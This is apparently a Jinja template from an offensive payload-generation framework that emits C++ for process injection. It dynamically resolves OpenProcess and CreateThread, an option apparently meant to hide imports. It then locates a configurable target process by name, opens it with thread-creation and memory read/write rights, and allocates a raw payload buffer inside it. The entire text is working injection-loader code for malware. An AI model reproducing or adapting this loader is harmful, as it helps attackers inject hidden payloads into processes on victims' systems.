{% if section == "globals" %}
    {% if link.alloc.functions.value in ["dynamic", "direct"] %}
        {{ function_typedef("OpenProcess") }}
        {{ function_typedef("CreateThread") }}
    {% endif %}

    {% include "lib/sections.jinja" %}
    {% include "lib/find_process.cpp" %}
{% else %}
    int pid = FindProcess("{{ link.target_process_name }}");
    if(!pid){
        printf("[-] Failed to discover process\n");
        return 0;
    }

    {{ function_definition("OpenProcess") }}

    HANDLE hProc = pOpenProcess(
        PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
        FALSE,
        (DWORD) pid
    );

    HANDLE hSelfProc = GetCurrentProcess();
    void *mem = alloc(hSelfProc, hProc, raw, length);
{% endif %}
